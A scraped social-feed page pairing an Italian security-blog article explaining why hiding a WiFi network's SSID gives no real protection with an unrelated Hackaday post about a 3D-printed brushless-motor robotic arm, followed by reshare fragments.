Cominciamo da uno dei più comuni: nascondere il nome della rete (SSID) è davvero un modo efficace per aumentare la sicurezza?
Come Funziona:
Nascondere la rete WiFi significa semplicemente disabilitare la trasmissione del SSID (Service Set Identifier) nei beacon frame. Ovvero disabilitare i segnali periodici inviati dall’access point per annunciare la presenza della rete WiFi ai dispositivi vicini.
In pratica, il nome della rete non compare più nella lista delle reti disponibili. Tuttavia, questa misura può essere considerata “puramente cosmetica” e non offre alcuna reale protezione, anzi può diventare un punto debole.
Vediamo cosa succede nel dettaglio:
- L’access point smette di annunciare attivamente la rete:
Disabilitando il broadcast del SSID, l’AP continua a inviare i beacon frame1, ma il campo SSID viene lasciato vuoto o impostato come “null”. Questo fa sì che il nome della rete sembri nascosto. - I client devono inviare richieste attive per trovare la rete:
I client configurati per connettersi a una rete nascosta non possono più scoprirla passivamente. Devono quindi inviare probe request2 attive per cercare quella rete specifica, includendo nel pacchetto proprio l’SSID. - L’SSID è incluso in chiaro nelle probe request:
Anche se l’AP non annuncia più la rete, i dispositivi client rivelano comunque l’SSID ogni volta che tentano di connettersi. Queste richieste contengono il nome della rete in chiaro e possono essere facilmente intercettate. - Processo di connessione e relative informazioni transitano in chiaro:
Le probe request e le relative risposte non sono cifrate. Questo significa che chiunque stia ascoltando il traffico WiFi – con strumenti liberamente disponibili e di facile utilizzo – può rilevare il nome della rete nascosta in pochi secondi.
Evidenza
youtube.com/embed/dy6nrzO807g?…
⚠️ Questo video è a scopo educativo! Non utilizzarlo per attività illegali o senza autorizzazione.⚠️
In questo video realizzato da Matteo Brandi vogliamo dare un evidenza pratica su:
✅ Come funzionano le reti WiFi nascoste
✅ Quali strumenti usare per rilevare un SSID nascosto
✅ Come scoprire il nome della rete in modo semplice e pratico
Conclusione
Come mostrato nel video qui sopra, nascondere il nome della rete (SSID) non offre alcun reale vantaggio in termini di sicurezza. Anzi:
- Gli hacker possono intercettare il nome della rete in pochi minuti, rendendo questa “protezione” del tutto illusoria.
- Una rete nascosta può addirittura attirare più attenzione, perché una configurazione non standard può essere vista come un obiettivo potenzialmente interessante da esplorare.
- Nascondere l’SSID non è una misura di sicurezza efficace: il nome della rete può essere facilmente rilevato anche con strumenti di base, rendendo questa pratica inutile contro qualsiasi attacco, anche non sofisticato.
Nei prossimi articoli affronteremo altri falsi miti, come:
- “Se non faccio pagamenti o login, sono al sicuro”
- “Non corro rischi se mi connetto solo a siti HTTPS”
- “Se uso una VPN, sono completamente al sicuro”
- “Il WiFi aperto è solo per i guest, quindi non ci sono rischi per l’azienda”
Continua a seguirci la nostra Rubrica WiFI per navigare informato, protetto e consapevole.
- Beacon Frame
Un beacon frame è un tipo di frame di gestione utilizzato nelle reti WLAN basate sullo standard IEEE 802.11. Contiene informazioni fondamentali sulla rete e viene trasmesso periodicamente per:
– Annunciare la presenza di una rete wireless (WLAN);
– Fornire un segnale di sincronizzazione ai dispositivi connessi, aiutandoli a mantenere la comunicazione allineata.
Come Spiegato nell’articolo “Dentro le reti wireless-ieee-802-11: Architettura e Segnale WiFi”
Nelle reti con infrastruttura (in modalità Infrastructure Basic Service Set, BSS), i beacon frame vengono inviati dall’access point (AP).
Nelle reti ad hoc (o Independent BSS, IBSS), invece, la generazione dei beacon è distribuita tra i vari dispositivi partecipanti.
NB: Dobbiamo sempre tenere presente gli effetti sull’ambiente radio. Nel caso della banda a 2,4 GHz, se si configurano più di 15 SSID su canali non sovrapposti (o più di 45 SSID in totale), i beacon frame iniziano a occupare una quantità significativa di tempo trasmissivo (air time).
Questo fenomeno può degradare sensibilmente le prestazioni della rete, anche se la maggior parte delle reti è inattiva, poiché i beacon continuano comunque a essere trasmessi periodicamente. ↩︎ - Probe Request: Una probe request è un messaggio inviato da un dispositivo client (come uno smartphone o un laptop) per cercare reti WiFi disponibili. Quando un dispositivo tenta di connettersi a una rete WiFi nascosta o salvata, invia probe request specifiche contenenti l’SSID della rete che sta cercando. Questi messaggi non sono cifrati, quindi possono essere intercettati facilmente da chiunque stia monitorando il traffico di rete. ↩︎
L'articolo Proteggere il WiFi nascondendo il nome? Si tratta di una falsa sicurezza proviene da il blog della sicurezza informatica.
Printed Robotic Arm Pumps Up With Brushless Motors
[JesseDarr] recently wrote in to tell us about their dynamic Arm for Robitc Mischief (dARM), a mostly 3D printed six degrees of freedom (6DOF) robotic arm that’s designed to be stronger and more capable than what we’ve seen so far from the DIY community.
The secret? Rather than using servos, dARM uses brushless DC (BLDC) motors paired with ODrive S1 controllers. He credits [James Bruton] and [Skyentific] (two names which regular Hackaday readers are likely familiar with) for introducing him to not only the ODrive controllers, but the robotics applications for BLDCs in the first place.
dARM uses eight ODrive controllers on a CAN bus, which ultimately connect up to a Raspberry Pi 4B with a RS485 CAN Hat. The controllers are connected to each other in a daisy chain using basic twisted pair wire, which simplifies the construction and maintenance of the modular arm.
As for the motors themselves, the arm uses three different types depending on where they are located, with three Eaglepower 8308 units for primary actuators, a pair of GB36-2 motors in the forearm, and finally a GM5208-24 for the gripper. Together, [JesseDarr] says the motors and gearboxes are strong enough to lift a 5 pound (2.2 kilogram) payload when extended in a horizontal position.
The project’s documentation includes assembly instructions for the printed parts, a complete Bill of Materials, and guidance on how to get the software environment setup on the Raspberry Pi. It’s not exactly a step-by-step manual, but it looks like there’s more than enough information here for anyone who’s serious about building a dARM for themselves.
If you’d like to start off by putting together something a bit easier, we’ve seen considerably less intimidating robotic arms that you might be interested in.
youtube.com/embed/Pv4tDsQZbRw?…
Piero Bosio
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
reshared this
Informatica (Italy e non Italy 😁) e Cybersecurity & cyberwarfare reshared this.